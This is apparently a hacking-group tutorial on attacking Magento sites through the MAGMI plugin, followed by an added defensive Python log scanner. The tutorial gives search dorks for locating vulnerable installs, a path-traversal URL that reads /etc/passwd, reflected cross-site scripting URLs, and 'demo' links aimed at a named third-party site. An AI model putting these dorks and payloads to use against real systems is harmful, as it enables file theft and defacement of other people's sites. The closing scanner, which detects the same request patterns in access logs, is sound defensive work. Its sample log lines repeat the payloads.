Website Defacement Method: Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting
Written By Garooda Security Squad
Hi ART-Team family :) This time I want to share a tutorial that I myself am still confused about how to use >_<
[+] DORK :
inurl:/media/magmi/magmi/web/
inurl:/web/magmi_import_run.php
inurl:/old-site/magmi/web/
inurl:/magmi/web/magmi.php?
index of /media/magmi/magmi/web/css/
[+] VULN :
[+] EXPLOIT LFI :
www.NDAS.mu/[path]/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
[+] EXPLOIT XSS :
www.NDAS.mu/[path]/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E
www.NDAS.mu/[path]/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E
[+] DEMO LFI :
http://www.gooddrop.com.au/media/magmi/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
[+] DEMO XSS :
http://www.gooddrop.com.au/media/magmi/magmi/web/magmi_import_run.php?%3C%2Fscript%3E%3Cscript%3Ealert%28%27HACKED+by+_MisterNotFound_%27%29%3B%3C%2Fscript%3E
That's all for this tutorial from _MisterNotFound_
Happy Ramadan fasting ;)
Don't forget to like our team's fan page on Facebook ;)
Thank you.
Wassalamualaikum Wr. Wb.
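
A defender-side check for the two request patterns listed above, as an added example that is not part of the original post: it scans web-server access logs for traversal sequences in the `file` parameter of ajax_pluginconf.php and for HTML tags in the query string of magmi_import_run.php and magmi.php, decoding repeatedly so double-encoded payloads are also caught. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:01:02 +0000] "GET /media/magmi/magmi/web/ajax_pluginconf.php?file=../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1" 200 1532
203.0.113.7 - - [01/Jan/2024:10:01:09 +0000] "GET /magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 811
198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /magmi/web/magmi.php?configstep=2&profile=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 900
192.0.2.10 - - [01/Jan/2024:10:03:00 +0000] "GET /magmi/web/magmi.php?configstep=2&profile=default HTTP/1.1" 200 4210
192.0.2.10 - - [01/Jan/2024:10:03:05 +0000] "GET /magmi/web/ajax_pluginconf.php?file=pluginconf.php&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1" 200 640
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)|^[\\/]')  # ../ segments or absolute path
HTML_TAG = re.compile(r'<\s*/?\s*[a-z][^>]*>|javascript:', re.I)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client_ip, finding) for a suspicious MAGMI request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target = m.groups()
    url = urlsplit(target)
    script = url.path.rsplit("/", 1)[-1].lower()
    if "/magmi/" not in url.path.lower():
        return None
    if script == "ajax_pluginconf.php":
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            if TRAVERSAL.search(fully_decode(value)):
                return ip, "lfi-traversal"
    if script in ("magmi_import_run.php", "magmi.php") and HTML_TAG.search(fully_decode(url.query)):
        return ip, "reflected-xss"
    return None

def scan(log_text):
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```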